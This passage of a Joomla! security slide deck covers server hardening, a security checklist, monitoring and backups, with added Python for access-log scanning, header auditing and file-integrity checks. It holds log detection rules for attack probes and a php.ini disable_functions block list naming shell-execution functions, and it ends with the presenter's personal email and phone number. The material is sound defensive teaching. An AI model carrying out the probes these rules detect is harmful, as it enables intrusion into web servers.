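    ("phpinfo_probe",     re.compile(r"phpinfo")),
]

def normalise(path):
    """URL-decode twice (catches double-encoded payloads) and lower-case."""
    return unquote_plus(unquote_plus(path)).lower()

def scan_line(line):
    """Return (ip, status, [rule names that fired]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    text = normalise(m.group("path"))
    return m.group("ip"), int(m.group("status")), [n for n, rx in RULES if rx.search(text)]

def scan_log(text):
    """Return {client ip: sorted rule names} for every client that tripped at least one rule."""
    findings = {}
    for line in text.splitlines():
        parsed = scan_line(line)
        if parsed and parsed[2]:
            findings.setdefault(parsed[0], set()).update(parsed[2])
    return {ip: sorted(rules) for ip, rules in findings.items()}

if __name__ == "__main__":
    for ip, rules in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(rules)}")
```

Treat hits as leads for the log review on slide 49, not as verdicts: a legitimate redirect parameter can also match the RFI rule.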
17. What should we do to prevent it?
Joomla! security involves:
• Server operating system
• Server software
• PHP + MySQL
• Joomla
• Extensions
• Users and their behaviour

18. What should we do to prevent it? Security action plan
1. Update your server operating system
2. Update your server software, e.g. Apache, Nginx, IIS, LiteSpeed etc.
3. Update your PHP and MySQL server
4. Secure your server

19. What should we do to prevent it?
[1] Basic actions
[2] More complex actions
[3] Actions that require significant modification rights on the server (unless already implemented by default)
(Image by echiner1)
20. Joomla! Security: Server ~ shared, VPS and dedicated
• A shared server
  • Your site(s) live in the same hosting space as other sites that you do not administer
  • This is the cheapest hosting option
  • No say over the security of the other sites on the server
  • An old shared server is the worst location for your hosting
• A Virtual Private Server
  • Better than shared
  • Still can't change many settings

21. Joomla! Security: Server ~ shared, VPS and dedicated
• A dedicated server
  • Allows you to upgrade and tweak all the settings on the server
  • Host retains responsibility for maintenance

22. Joomla! Security: Server ~ security
1. The underlying operating system must be updated
2. Update the web server, e.g. Apache, Nginx etc.
3. Update PHP and MySQL
4. Secure the above
5. Install additional security layers
23. Joomla! Security: Server ~ security hardening
1. Securing the Apache web server: adding web headers to block XSS etc.
    <IfModule mod_headers.c>
        Header set X-XSS-Protection "1; mode=block"
        # (the next line is cut off on the original slide)
        Header set X-Content-Security-Policy "allow 'self'; options inline-script; img$
        Header set Strict-Transport-Security "max-age=43200; includeSubDomains"
        Header set Cache-Control "max-age=3600, public, must-revalidate"
        Header set X-Frame-Options "deny"
        Header set X-Content-Type-Options "nosniff"
        #Header set X-Content-Security-Policy "default-src 'self'"
        Header unset X-Powered-By
        Header unset X-Pingback
    </IfModule>
2. Hide the server signature
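An added example, not from the deck, that checks whether a site actually sends the hardening headers slide 23 configures; it runs here against constructed response headers rather than a live server. It also flags the Server/X-Powered-By leaks that item 2 (hide the server signature) removes, and reports the X-Content-Security-Policy name used on the slide as obsolete, since browsers only honour the unprefixed Content-Security-Policy.

```python
import re

def hsts_max_age(value):
    """max-age in seconds from a Strict-Transport-Security value, or None if absent/invalid."""
    m = re.search(r"max-age=(\d+)", value)
    return int(m.group(1)) if m else None

# Headers the slide's <IfModule mod_headers.c> block sets, with a minimal value check.
REQUIRED = {
    "x-xss-protection":          lambda v: v.strip().startswith("1"),
    "x-frame-options":           lambda v: v.strip().lower() in ("deny", "sameorigin"),
    "x-content-type-options":    lambda v: v.strip().lower() == "nosniff",
    "strict-transport-security": lambda v: hsts_max_age(v) is not None,
}

def audit_headers(headers, min_hsts_age=43200):
    """Return sorted findings for one response's headers (names matched case-insensitively).
    min_hsts_age defaults to the 43200 seconds the slide configures."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, ok in REQUIRED.items():
        if name not in h:
            findings.append(f"missing: {name}")
        elif not ok(h[name]):
            findings.append(f"weak: {name}={h[name]!r}")
    age = hsts_max_age(h.get("strict-transport-security", ""))
    if age is not None and age < min_hsts_age:
        findings.append(f"weak: strict-transport-security max-age {age} < {min_hsts_age}")
    # Browsers only honour the unprefixed header; the X- variant on the slide is obsolete.
    if "content-security-policy" not in h:
        findings.append("obsolete: x-content-security-policy (send content-security-policy)"
                        if "x-content-security-policy" in h else "missing: content-security-policy")
    # Leaks the slide unsets (item 2, hide the server signature).
    for name in ("x-powered-by", "x-pingback"):
        if name in h:
            findings.append(f"leak: {name}={h[name]!r}")
    if re.search(r"\d", h.get("server", "")):   # a version number means ServerTokens is not Prod
        findings.append(f"leak: server={h['server']!r} (set ServerTokens Prod)")
    return sorted(findings)

# Constructed responses: a default install, and the same host after applying slide 23.
BEFORE = {"Server": "Apache/2.4.7 (Ubuntu)", "X-Powered-By": "PHP/5.5.9", "Content-Type": "text/html"}
AFTER = {"Server": "Apache", "X-XSS-Protection": "1; mode=block",
         "X-Content-Security-Policy": "allow 'self'",
         "Strict-Transport-Security": "max-age=43200; includeSubDomains",
         "X-Frame-Options": "deny", "X-Content-Type-Options": "nosniff"}

if __name__ == "__main__":
    for label, hdrs in (("before", BEFORE), ("after", AFTER)):
        print(label, audit_headers(hdrs) or "ok")
```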
24. Joomla! Security: Server ~ security hardening
3. Activating .htaccess override in the Apache conf
• .htaccess files
  • [1] Activate the htaccess file in the Joomla root
  • [1] Use an .htpasswd for the /administrator/ folder
  • [3] Advanced .htaccess files

25. Joomla! Security: Server ~ security hardening
1. Hardening PHP with Suhosin
2. Use the PHP disable_functions setting (php.ini):
    disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
3. Do not expose the PHP version:
    expose_php = off
4. Use open_basedir (restricts the file-handling functions to a directory tree)
26. Joomla! Security: Server ~ security hardening
• Globally reset all files
  • Owner - AccountUsername:AccountUsername
      chown -R user:group *
  • Files - 644
      find . -type f -exec chmod 644 {} \;
  • Folders - 755
      find . -type d -exec chmod 755 {} \;
• Use suPHP: PHP files are run under the user of the website instead of the Apache user
27. Joomla! Security: Server ~ security hardening
1. Hardening the MySQL server
2. Disable access from outside (allow local connections only)
3. Make sure a password is set, or run the mysql_secure_installation command after setup

28. Joomla! Security: Server ~ additional security hardening
1. Add an additional firewall, e.g. CSF firewall
2. Add the mod_security firewall ~ an Apache module that helps to protect your website from various attacks. It blocks commonly known exploits by use of regular expressions and rule sets
3. Install a malware detector such as maldet
4. Install a rootkit detector
5. Install fail2ban / an IDS (intrusion detector)
29-30. Joomla! Security: Use a CDN for security
1. Prevent DDoS
2. Stop hackers
3. Secure website from attack

31-32. Joomla! Security: Use a CDN for security (image slides)
34. Joomla! Security Checklist (https://docs.joomla.org/Security)
Install official versions of Joomla! (http://www.joomla.org/download.html)
• Upgrade to the latest stable version of Joomla! as soon as possible.
• Download Joomla! from official sites only, such as JoomlaCode.org, and check the MD5 hash.
• Use web page diagnostic tools, i.e. Firefox Firebug, IE Web Developer Toolbar, Opera Dragonfly, etc., to ensure that all files were installed correctly.
Install official updates from Joomla!
• To avoid breaking your site, search the forums for reports of incompatible extensions before upgrading to a new version of Joomla.

35. Joomla! Security Checklist (https://docs.joomla.org/Security)
Default administrator username
• Change the user name of the default admin user. This simple step effectively increases the security of this critical account 50% by modifying one of the two variables attackers must know to gain access.
Administrator passwords
• Never use easy-to-guess passwords; avoid them at all cost, e.g. admin123, passwords, 123456
• Use mixed characters (upper and lower case) with special characters, e.g. F1$hn3Tw0Rk, and use more than 8 characters

36. Joomla! Security Checklist (https://docs.joomla.org/Security)
Limit superadmins
• Fewer superadmins mean fewer problems
Disable registration
• If you are not running a social site, or if your website is limited to your employees, disable registration

37. Joomla! Security Checklist (https://docs.joomla.org/Security)
Protecting directories and files
• All configurable paths must be writable
• Never use chmod 777; chmod 755 is sufficient for directories and 644 for files.
• Use .htaccess to stop directories such as images and download from running PHP files:
    # secure directory by disabling script execution
    AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
    Options -ExecCGI

38. Joomla! Security Checklist (https://docs.joomla.org/Security)
Remove all unneeded files and extensions
• All unneeded and unused files and extensions must be removed.
• In general, do not leave any unneeded files (compressed or otherwise) on a public server. Each unused (and perhaps long forgotten) file is a potential security hole.

39. Joomla! Security Checklist (https://docs.joomla.org/Security)
Installing Joomla! extensions
1. Always back up
2. Check for extension vulnerabilities
3. Download from trusted sites
4. Check the code quality of the extensions
5. Test on a development site
6. Remove junk
7. Avoid encrypted code
40. Joomla! Security: How to secure Joomla!
[1] SEF all URLs
[2] Clear the default Joomla metatags
[3] Clear the default home page title
[4] Remove the generator tag
[5] Change the favicon
[6] Hide component credits
The less information you give away about Joomla!, the harder the site is to attack.

41. Joomla! Security: How to secure Joomla! Implement two-factor authentication
Two-factor authentication is a login method whereby a person has to provide his/her user name, password and a randomly generated OTP (one-time password). The OTP is a six-digit numeric code, generated by cryptographic functions at short intervals. Even if a hacker were to guess your Joomla administrator username and password correctly, they would still require the OTP to log in.
Enabling two-factor authentication requires Joomla 3.2.0 or higher:
1. Log in to the Administration area.
2. Click on Components >> Post-installation Messages.
3. Click on Enable two-factor authentication.
4. Install a Google Authenticator compatible client for your device.
42. Joomla! Security: How to secure Joomla! Use CAPTCHA
• Spammers try to inject spam content onto your site
• They target Joomla core forms and extension forms
• Use CAPTCHA to fight against automated spammers

43. Joomla! Security: How to secure Joomla!
Use security extensions

44. Joomla! Security: How to secure Joomla! Disable FTP access from Joomla!
• If a hacker can obtain your FTP password, they can log in as you, bypassing almost every security barrier.
• FTP passwords are stored unencrypted in your FTP program!
• FTP authentication details pass unencrypted to the server!
• There are several common FTP apps that store their passwords in a standard location with a standard name!

45. Joomla! Security: How to secure Joomla!
Change the temporary folder and logs path

46. Joomla! Security: How to secure Joomla!
Make sure to check for Joomla!/extension updates

47. Joomla! Security: How to secure Joomla! Preparing for the worst
Are you ready?

48. Joomla! Security: How to secure Joomla! Preparing for the worst
1. Site monitoring
2. Joomla site backups
3. Restoring a hacked site
49. Joomla! Security: Site monitoring
• Diagnostics
  • Site down
  • Home page content changes
  • mod_security logs (show attempts)
  • Bandwidth use
  • Spam blacklisting
  • [3] Searching and browsing server logs
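Slide 26's permission rule and slide 49's "home page content changes" both come down to knowing what the web root looked like when it was clean. This added example (not from the deck) records a baseline manifest of the Joomla tree, a SHA-256 and mode per file, and later diffs the live tree against it to surface added, modified or removed files and anything world-writable (chmod 777, which slide 37 forbids). It runs here against a small constructed tree in a temporary directory; the file names are illustrative.

```python
import hashlib
import json
import os
import stat
import tempfile

def _walk(root):
    """Yield (relative path, absolute path) for every regular file under root, sorted."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root), full

def build_manifest(root):
    """Map relative path -> {'sha256': hex digest, 'mode': octal string} for the tree."""
    manifest = {}
    for rel, full in _walk(root):
        with open(full, "rb") as fh:
            digest = hashlib.sha256(fh.read()).hexdigest()
        manifest[rel] = {"sha256": digest, "mode": oct(stat.S_IMODE(os.lstat(full).st_mode))}
    return manifest

def compare(baseline, current):
    """Diff two manifests; a content or mode change counts as modified."""
    report = {"added": [], "removed": [], "modified": [], "world_writable": []}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        elif baseline[rel] != current[rel]:
            report["modified"].append(rel)
        if rel in current and int(current[rel]["mode"], 8) & stat.S_IWOTH:
            report["world_writable"].append(rel)
    return report

def demo():
    """Constructed scenario: snapshot a tiny Joomla-like tree, then tamper with it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        for name, body in (("index.php", "<?php // front controller\n"),
                           ("configuration.php", "<?php class JConfig {}\n")):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
            os.chmod(os.path.join(root, name), 0o644)
        baseline = json.loads(json.dumps(build_manifest(root)))   # as if reloaded from disk

        # Tampering: a line appended to index.php, a script dropped into images/, 777 on config.
        with open(os.path.join(root, "index.php"), "a") as fh:
            fh.write("// unexpected change\n")
        with open(os.path.join(root, "images", "x.php"), "w") as fh:
            fh.write("<?php\n")
        os.chmod(os.path.join(root, "configuration.php"), 0o777)
        return compare(baseline, build_manifest(root))

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline manifest off the web server (an attacker who can edit files can also edit a manifest stored beside them), and regenerate it after every legitimate update.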
50. Joomla! Security: Joomla! backup
• Why back up?
• When should I back up my Joomla! site?
• How often should I back up my Joomla! site?
• How to back up?

51. Joomla! Security: Joomla! backup
How to back up?
1. Manual backup through the command line (database)
2. Using extensions such as Akeeba Backup, EJB and XCloner
What to back up?
1. All files
2. Images or docs
REMEMBER TO TEST YOUR BACKUP

52. Joomla! Security: Restoring a hacked site
• Fixes the obvious problems
• Does not address:
  • Hidden hacks
  • Shell scripts
  • Backdoors
  • Zombies
  • Continuing vulnerabilities
  • Impacts of data exposure
(Photo: flickr.com/photos/andreweason)

53. The End
Shaiffulnizam Mohamad
OWASP member since 2010
Involved in every Joomla Day Malaysia since 2007
Specializing in Joomla! and security.
shaifful.md@gmail.com / 0129531452